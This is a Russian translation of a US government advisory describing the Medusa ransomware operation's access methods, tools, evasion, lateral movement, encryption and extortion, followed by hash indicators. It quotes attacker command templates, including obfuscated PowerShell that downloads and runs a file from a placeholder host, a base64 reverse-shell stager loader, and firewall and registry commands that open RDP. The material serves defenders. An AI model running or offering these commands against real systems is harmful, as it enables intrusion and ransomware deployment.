Medusa Ransomware IOCs и TTPs

Федеральное бюро расследований (ФБР), Агентство кибербезопасности и безопасности инфраструктуры (CISA) и Многоштатный центр обмена информацией и анализа (MS-ISAC) выпустили сообщение о ransomware-as-a-service (RaaS) Medusa, который был обнаружен в июне 2021 года. Вариант Medusa нанес ущерб более чем 300 организациям в разных секторах, включая медицину, образование, юриспруденцию и производство.

Оглавление

Medusa Ransomware

Medusa - это вариант ransomware-as-a-service (RaaS), впервые обнаруженный в июне 2021 года. По состоянию на февраль 2025 года разработчики и аффилированные лица Medusa нанесли ущерб более чем 300 жертвам из различных секторов критической инфраструктуры, включая медицину, образование, юриспруденцию, страхование, технологии и производство. По данным расследования ФБР, вариант Medusa ransomware не связан с вариантом MedusaLocker и вариантом Medusa mobile malware.

Первоначальный доступ

Разработчики Medusa обычно набирают брокеров первоначального доступа (IAB) на киберпреступных форумах и торговых площадках, чтобы получить первоначальный доступ к потенциальным жертвам. Этим аффилированным лицам предлагаются потенциальные выплаты в размере от 100 до 1 миллиона долларов США с возможностью работать исключительно на Medusa. Известно, что ОВД (аффилированные лица) Medusa используют такие распространенные методы, как:

Фишинговые кампании как основной метод кражи учетных данных жертв
Эксплуатация уязвимостей непропатченного программного обеспечения через общие уязвимости и уязвимые места (CVE), такие как уязвимость ScreenConnect CVE-2024-1709 [CWE-288: Authentication Bypass Using an Alternate Path or Channel] и уязвимость SQL-инъекции Fortinet EMS [CVE-2023-48788].

Обнаружение

Агенты Medusa используют для первоначального поиска пользователей, систем и сетей инструменты Advanced IP Scanner и SoftPerfect Network Scanner. После того как жертва закрепилась в сети, обычно сканируются такие порты, как:

21 (FTP)
22 (SSH)
23 (Telnet)
80 (HTTP)
115 (SFTP)
443 (HTTPS)
1433 (база данных SQL)
3050 (база данных Firebird)
3128 (HTTP веб-прокси)
3306 (база данных MySQL)
3389 (RDP)

Актеры Medusa в основном используют PowerShell и командную строку Windows (cmd.exe) для перечисления сетевых и файловых систем, а также для использования возможностей Ingress Tool Transfer. Агенты Medusa используют инструменты управления Windows Management Instrumentation (WMI) для запроса системной информации.

Уклонение от защиты

Действующие лица Medusa используют LOTL, чтобы избежать обнаружения. Certutil (certutil.exe) используется для того, чтобы избежать обнаружения при проникновении в файлы.

Было замечено, что злоумышленники используют несколько различных методов обхода обнаружения PowerShell с возрастающей сложностью, которые представлены ниже. Кроме того, участники Medusa пытаются замести следы, удаляя историю командной строки PowerShell

В этом примере агенты Medusa используют хорошо известную технику уклонения, которая выполняет зашифрованную в base64 команду с использованием определенных параметров выполнения.

powershell -exec bypass -enc <зашифрованная строка команды base64>

1	powershell -exec bypass -enc <зашифрованная строка команды base64>

В другом примере строка DownloadFile обфусцируется путем разбиения ее на части и ссылки на нее через переменную

powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RAS tool>.msi)

1	powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RAS tool>.msi)

В последнем примере полезная нагрузка представляет собой обфусцированную строку base64, которая считывается в память, распаковывается gzip и используется для создания блока сценариев. Полезная нагрузка base64 разделяется с помощью пустых строк и конкатенации, а также используется оператор формата (-f), за которым следуют три аргумента, чтобы указать замену символов в полезной нагрузке base64.

powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((
New-Object System.IO.StreamReader(
New-Object System.IO.Compression.GzipStream((
New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(
(('<строка полезной нагрузки base64>')-f'<замена символа 0>','<замена символа 1>','<замена символа 2>')))),[System.IO.Compression.CompressionMode]::Decompress])).ReadToEnd())))

powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((

New-Object System.IO.StreamReader(

New-Object System.IO.Compression.GzipStream((

New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(

(('<строка полезной нагрузки base64>')-f'<замена символа 0>','<замена символа 1>','<замена символа 2>')))),[System.IO.Compression.CompressionMode]::Decompress])).ReadToEnd())))

Обфусцированная base64 полезная нагрузка PowerShell идентична powerfun.ps1, общедоступному сценарию stager, который может создавать обратную или связывающую оболочку по TLS для загрузки дополнительных модулей. В связующей оболочке скрипт ожидает соединения на локальном порту 443, а в обратной оболочке инициирует соединение с удаленным портом 443.

В некоторых случаях участники Medusa пытались использовать уязвимые или подписанные драйверы для уничтожения или удаления средств обнаружения и реагирования на конечные точки (EDR). ФБР заметило, что участники Medusa используют следующие инструменты для поддержки командования и управления (C2) и уклонения от обнаружения:

Ligolo. Инструмент обратного туннелирования, часто используемый для создания защищенных соединений между взломанным хостом и машиной злоумышленника.
Cloudflared. Ранее известный как ArgoTunnel.
Используется для безопасного вывода приложений, сервисов или серверов в Интернет через туннель Cloudflare, не открывая их напрямую.

Латеральное перемещение и исполнение

Действующие лица Medusa используют различные легальные программы удаленного доступа; в качестве средства уклонения от обнаружения они могут выбирать любые средства удаленного доступа, уже присутствующие в среде жертвы. В ходе расследования было установлено, что участники Medusa используют программное обеспечение для удаленного доступа AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp и Splashtop. Medusa использует эти инструменты в сочетании с протоколами удаленного рабочего стола (RDP) и PsExec для перемещения по сети и поиска файлов для утечки и шифрования. Получив действительные учетные данные имени пользователя и пароля, агенты Medusa используют PsExec, чтобы:

Скопировать (-c) один скрипт из различных пакетных скриптов на текущей машине на удаленную машину и выполнить его с привилегиями уровня SYSTEM (-s).
Выполнить уже существующий локальный файл на удаленной машине с привилегиями уровня SYSTEM.
Выполнение команд удаленного командного интерпретатора с помощью cmd /c.

Одним из пакетных сценариев, выполняемых PsExec, является openrdp.bat, который сначала создает новое правило брандмауэра для разрешения входящего TCP-трафика на порту 3389:

netsh advfirewall firewall add rule name=«rdp» dir=in protocol=tcp localport=3389 action=allow

1	netsh advfirewall firewall add rule name=«rdp» dir=in protocol=tcp localport=3389 action=allow

Затем создается правило для разрешения удаленных WMI-соединений:

netsh advfirewall firewall set rule group=«windows management instrumentation (wmi)» new enable=yes

1	netsh advfirewall firewall set rule group=«windows management instrumentation (wmi)» new enable=yes

Наконец, реестр изменяется, чтобы разрешить подключения к удаленному рабочему столу:

reg add «HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server» /v fDenyTSConnections /t REG_DWORD /d 0 /f

1	reg add «HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server» /v fDenyTSConnections /t REG_DWORD /d 0 /f

Mimikatz также был замечен в использовании для дампа Local Security Authority Subsystem Service (LSASS) для сбора учетных данных и содействия боковому перемещению.

Эксфильтрация и шифрование

Действующие лица «Медузы» устанавливают и используют Rclone для облегчения утечки данных на C2-серверы Medusa, используемые участниками и филиалами. Действующие лица используют Sysinternals PsExec, PDQ Deploy или BigFix для установки шифратора gaze.exe на файлы по всей сети, при этом они отключают Windows Defender и другие антивирусные службы на определенных объектах. Зашифрованные файлы имеют расширение .medusa. Процесс gaze.exe завершает работу всех служб, связанных с резервным копированием, безопасностью, базами данных, коммуникацией, обменом файлами и веб-сайтами, затем удаляет теневые копии и шифрует файлы с помощью AES-256, после чего бросает записку с выкупом. Затем злоумышленники вручную отключают и шифруют виртуальные машины, а также удаляют ранее установленные на них инструменты.

Вымогательство

Medusa RaaS использует двойную модель вымогательства, когда жертвы должны заплатить, чтобы расшифровать файлы и предотвратить их дальнейшее распространение. В записке с требованием выкупа жертвам предлагается связаться с ними в течение 48 часов либо через чат в браузере Tor, либо через Tox, платформу мгновенного обмена сообщениями с сквозным шифрованием. Если жертва не ответит на записку о выкупе, агенты Medusa свяжутся с ней напрямую по телефону или электронной почте. Medusa использует сайт утечки данных .onion, на котором жертвы разглашают информацию, а также ведут обратный отсчет времени до ее обнародования. На сайте размещаются требования о выкупе с прямыми гиперссылками на связанные с Medusa криптовалютные кошельки. На этом этапе Medusa одновременно рекламирует продажу данных заинтересованным лицам до окончания таймера обратного отсчета. Жертвы могут дополнительно заплатить 10 000 долларов США в криптовалюте, чтобы добавить один день к таймеру обратного отсчета.

В ходе расследования ФБР выяснилось, что после уплаты выкупа с одной из жертв связался другой участник Medusa, который заявил, что переговорщик украл уже уплаченную сумму выкупа и потребовал повторно внести половину платежа, чтобы предоставить «настоящий дешифратор», что может свидетельствовать о тройной схеме вымогательства.

Indicators of Compromise

Emails

MD5

44370f5c977e415981febf7dbb87a85c
80d852cd199ac923205b61658a9ec5bc